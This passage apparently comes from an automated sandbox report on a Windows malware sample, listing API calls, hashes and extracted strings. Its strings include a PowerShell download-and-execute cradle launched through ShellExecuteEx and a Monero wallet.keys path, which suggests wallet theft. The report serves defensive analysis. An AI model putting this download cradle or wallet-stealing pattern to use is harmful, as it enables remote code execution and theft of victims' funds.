                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: 8ccbb2d8bc453ae06a491ae7e70d234e8717f10a234968b7cde7f9928335610b
                              • Instruction ID: 392d0424c6bce28536623997a32818de49cf7719c1bd493ef9d0674759ebb8e1
                              • Opcode Fuzzy Hash: 8ccbb2d8bc453ae06a491ae7e70d234e8717f10a234968b7cde7f9928335610b
                              • Instruction Fuzzy Hash: 993162B690021857CB24F7A0DC86FE97378AF48700F40459DB31996081EEB8A6C99B95
                              APIs
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                                • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                                • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                                • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                                • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                                • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00FC2D85
                              Strings
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00FC2CC4
                              • <, xrefs: 00FC2D39
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00FC2D04
                              • ')", xrefs: 00FC2CB3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: 7a15d8216b0de56d73d5b2bebbf0024ae6be9926345dcf1122c117e22b5cb2cb
                              • Instruction ID: 5e1e31676f812e5342e52b0100bfb55643f9d54a64d1cb1e9c842e00c58fd3a9
                              • Opcode Fuzzy Hash: 7a15d8216b0de56d73d5b2bebbf0024ae6be9926345dcf1122c117e22b5cb2cb
                              • Instruction Fuzzy Hash: 3341B97181020D9BDB18EBA0DD97FEDB774AF10304F40411DE016AA1D1EF786A4AEF96
                              APIs
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00FB9F41
                                • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$AllocLocal
                              • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                              • API String ID: 4171519190-1096346117
                              • Opcode ID: 9e9c89b0d39fc7c55a802db065c0cd8cc8e9ecba9643cbc4b2c4da7167764cab
                              • Instruction ID: c7dbb96839b949bbe04420bec4aad3aae57b3271fbcd26912b7bd2e5f756aa73
                              • Opcode Fuzzy Hash: 9e9c89b0d39fc7c55a802db065c0cd8cc8e9ecba9643cbc4b2c4da7167764cab
                              • Instruction Fuzzy Hash: 1A614C71A0020CABDB24EFA5CD96FED7775BF44344F048118F90A5B281EB786A05EF52
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,00DECE30,00000000,00020119,?), ref: 00FC40F4
                              • RegQueryValueExA.ADVAPI32(?,00DEE328,00000000,00000000,00000000,000000FF), ref: 00FC4118
                              • RegCloseKey.ADVAPI32(?), ref: 00FC4122
                              • lstrcat.KERNEL32(?,00000000), ref: 00FC4147
                              • lstrcat.KERNEL32(?,00DEE220), ref: 00FC415B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValue
                              • String ID:
                              • API String ID: 690832082-0
                              • Opcode ID: 2cd82810e82c479980ea2231c776630473e7ff67576512994c63e66879f8f152
                              • Instruction ID: 89ddc70a09cffd65d42c840033be18a837175423143535cb83d7445ffda984d5
                              • Opcode Fuzzy Hash: 2cd82810e82c479980ea2231c776630473e7ff67576512994c63e66879f8f152
                              • Instruction Fuzzy Hash: BF41EAB6D001086BDB28EBA0EC57FED373CBB48340F44455CB62957185EA795BC88BE1
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 00FC696C
                              • sscanf.NTDLL ref: 00FC6999
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00FC69B2
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00FC69C0
                              • ExitProcess.KERNEL32 ref: 00FC69DA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID:
                              • API String ID: 2533653975-0
                              • Opcode ID: b08c64b4e23dcdb9214faf6ae1e26ff99f84427d8fe895844db4b5e745dcf543
                              • Instruction ID: 0013c20cde79ceeb0cf974ae05ffa057f2f4fda2db9d2775cac92aff22e90b31
                              • Opcode Fuzzy Hash: b08c64b4e23dcdb9214faf6ae1e26ff99f84427d8fe895844db4b5e745dcf543
                              • Instruction Fuzzy Hash: 2821EC75D04209ABCF08EFE4E946AEEB7B5BF48300F04852EE41AE3244EB346605CB65
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FC7E37
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FC7E3E
                              • RegOpenKeyExA.ADVAPI32(80000002,00DDC0D0,00000000,00020119,?), ref: 00FC7E5E
                              • RegQueryValueExA.ADVAPI32(?,00DECE70,00000000,00000000,000000FF,000000FF), ref: 00FC7E7F
                              • RegCloseKey.ADVAPI32(?), ref: 00FC7E92
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 00e2401850bc0e8040b3d468d97a50b1ee6d93b4fe506bfa3eb9ee0c1e250efe
                              • Instruction ID: 9b4c309deb7cde7a862176b624cd069f7200f2a458e0296b3ed85c8889163707
                              • Opcode Fuzzy Hash: 00e2401850bc0e8040b3d468d97a50b1ee6d93b4fe506bfa3eb9ee0c1e250efe
                              • Instruction Fuzzy Hash: 251191B2A44205EBD714DF94E94AF7FBBB8EB44711F10422DF61AA7284D77858009FA0
                              APIs
                              • StrStrA.SHLWAPI(00DEE058,?,?,?,00FC140C,?,00DEE058,00000000), ref: 00FC926C
                              • lstrcpyn.KERNEL32(011FAB88,00DEE058,00DEE058,?,00FC140C,?,00DEE058), ref: 00FC9290
                              • lstrlen.KERNEL32(?,?,00FC140C,?,00DEE058), ref: 00FC92A7
                              • wsprintfA.USER32 ref: 00FC92C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: 1f2d713b0105dea11d874a2b9abbde0cbbde1ce96a7a26cb27052cefe3a54edc
                              • Instruction ID: 22ce5e7699ce556979e955153785c421e72d44140cc0869293c44fd52a201396
                              • Opcode Fuzzy Hash: 1f2d713b0105dea11d874a2b9abbde0cbbde1ce96a7a26cb27052cefe3a54edc
                              • Instruction Fuzzy Hash: D401E975500108FFCB08DFE8D988EAE7BB9EF44350F10854CF90D97204C675AA41DB90
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FB12B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FB12BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00FB12D7
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00FB12F5
                              • RegCloseKey.ADVAPI32(?), ref: 00FB12FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 9ebac140fa1e4e1b5d9a7617492cb2ab80855aebfd3d8c1521332f8dda39bcc8
                              • Instruction ID: 5f1f182d3099c857601fbd94634889fa4a076a77d579c8c53897f02e0a68323b
                              • Opcode Fuzzy Hash: 9ebac140fa1e4e1b5d9a7617492cb2ab80855aebfd3d8c1521332f8dda39bcc8
                              • Instruction Fuzzy Hash: 3A0136B9A40208BFDB14DFD0E849FAEB7B8EF48701F008159FA1997284D675AA418F50
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Type
                              • String ID:
                              • API String ID: 2109742289-3916222277
                              • Opcode ID: 72c6dc89013b166e89886936ebd614f1b352a5b3a42776681a4e8cada7c0963b
                              • Instruction ID: 23b3795d9406d53db5b4ad3b4845ea83d6736969016aa3f1d4cbbdf62cc6896f
                              • Opcode Fuzzy Hash: 72c6dc89013b166e89886936ebd614f1b352a5b3a42776681a4e8cada7c0963b
                              • Instruction Fuzzy Hash: 8D41E5B150079D5EDB218B248E86FFBBBE89B45704F1444ECE98E86182D2719A45EFA0
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00FC6663
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                                • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                                • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                                • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00FC6726
                              • ExitProcess.KERNEL32 ref: 00FC6755
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00FD0E28,00000000,?), ref: 00FC882F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FC8836
                              • wsprintfA.USER32 ref: 00FC8850
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00FC951E,00000000), ref: 00FC8D5B
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FC8D62
                              • wsprintfW.USER32 ref: 00FC8D78
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesswsprintf
                              • String ID: %hs
                              • API String ID: 769748085-2783943728
                              APIs
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                                • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                                • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                                • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                                • Part of subcall function 00FC8B60: GetSystemTime.KERNEL32(00FD0E1A,00DED7F0,00FD05AE,?,?,00FB13F9,?,0000001A,00FD0E1A,00000000,?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FC8B86
                                • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                                • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FBA2E1
                              • lstrlen.KERNEL32(00000000,00000000), ref: 00FBA3FF
                              • lstrlen.KERNEL32(00000000), ref: 00FBA6BC
                                • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                              • DeleteFileA.KERNEL32(00000000), ref: 00FBA743
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              APIs
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                                • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                                • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                                • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                                • Part of subcall function 00FC8B60: GetSystemTime.KERNEL32(00FD0E1A,00DED7F0,00FD05AE,?,?,00FB13F9,?,0000001A,00FD0E1A,00000000,?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FC8B86
                                • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                                • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FBD481
                              • lstrlen.KERNEL32(00000000), ref: 00FBD698
                              • lstrlen.KERNEL32(00000000), ref: 00FBD6AC
                              • DeleteFileA.KERNEL32(00000000), ref: 00FBD72B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              APIs
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
